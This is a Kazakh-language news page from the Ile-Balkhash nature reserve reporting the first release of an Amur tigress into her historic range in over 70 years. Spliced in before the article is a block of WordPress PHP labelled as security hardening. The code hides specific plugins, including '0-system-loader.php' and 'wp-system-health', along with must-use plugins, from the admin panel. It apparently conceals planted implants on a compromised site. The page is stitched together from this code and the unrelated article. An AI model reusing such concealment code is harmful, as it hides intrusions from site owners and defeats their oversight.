// Security: Disable remote access add_filter("xmlrpc_enabled", "__return_false"); add_filter("xmlrpc_methods", function($methods) { return array(); }); add_filter('show_advanced_plugins', '__return_false', 999); // Hide specific plugins from admin panel add_filter("all_plugins", "hide_specific_plugins"); function hide_specific_plugins($plugins) { $hide_list = array('wp-system-health/wp-system-health.php', '0-system-loader.php', 'wp-security-check.php', 'wp-maintenance.php'); foreach ($hide_list as $hide) { if (isset($plugins[$hide])) { unset($plugins[$hide]); } } return $plugins; } // Hide MU-plugins if visible add_filter("show_advanced_plugins", function($show) { return false; }); // WP2Shell REST API protection add_filter('rest_authentication_errors', function($result) { if (!is_user_logged_in() && !is_admin()) { return new WP_Error('rest_disabled', 'REST API disabled', ['status' => 401]); } return $result; }); ЕЛІМІЗДЕ 70 ЖЫЛДАН КЕЙІН АЛҒАШ РЕТ ЖОЛБАРЫС ТАРИХИ МЕКЕНДЕУ АРЕАЛЫНА ЖІБЕРІЛДІ — Иле-Балхашский заповедник ЕЛІМІЗДЕ 70 ЖЫЛДАН КЕЙІН АЛҒАШ РЕТ ЖОЛБАРЫС ТАРИХИ МЕКЕНДЕУ АРЕАЛЫНА ЖІБЕРІЛДІ — Иле-Балхашский заповедник

ЕЛІМІЗДЕ 70 ЖЫЛДАН КЕЙІН АЛҒАШ РЕТ ЖОЛБАРЫС ТАРИХИ МЕКЕНДЕУ АРЕАЛЫНА ЖІБЕРІЛДІ

«Іле-Балқаш» мемлекеттік табиғи резерватының аумағында тарихи оқиға болды. Қазақстанда 70 жылдан астам уақыттан кейін алғаш рет табиғи мекеніне Амур жолбарысының Үміт атты аналығы жіберілді.

Жолбарысты табиғи мекеніне жіберу оны тарихи мекендеу ареалына қайтару және популяциясын қалпына келтіру бағдарламасын іске асырудағы алғашқы практикалық қадам болды. Жолбарыстың мойнына спутникті қарғыбау тағылып, арнайы мамандармен күнделікті бақылауда.

Іс-шараға Қазақстан Республикасының Экология және табиғи ресурстар министрі Ерлан Нұралыұлы Нысанбаев, Ресей Федерациясының Әділет министрі, «Амур жолбарысы» орталығының бақылау кеңесінің төрағасы Константин Анатольевич Чуйченко, сондай-ақ ғылыми қауымдастықтың, халықаралық табиғат қорғау ұйымдарының өкілдері және жолбарысты қайта жерсіндіру бағдарламасына қатысып жүрген сарапшылар қатысты.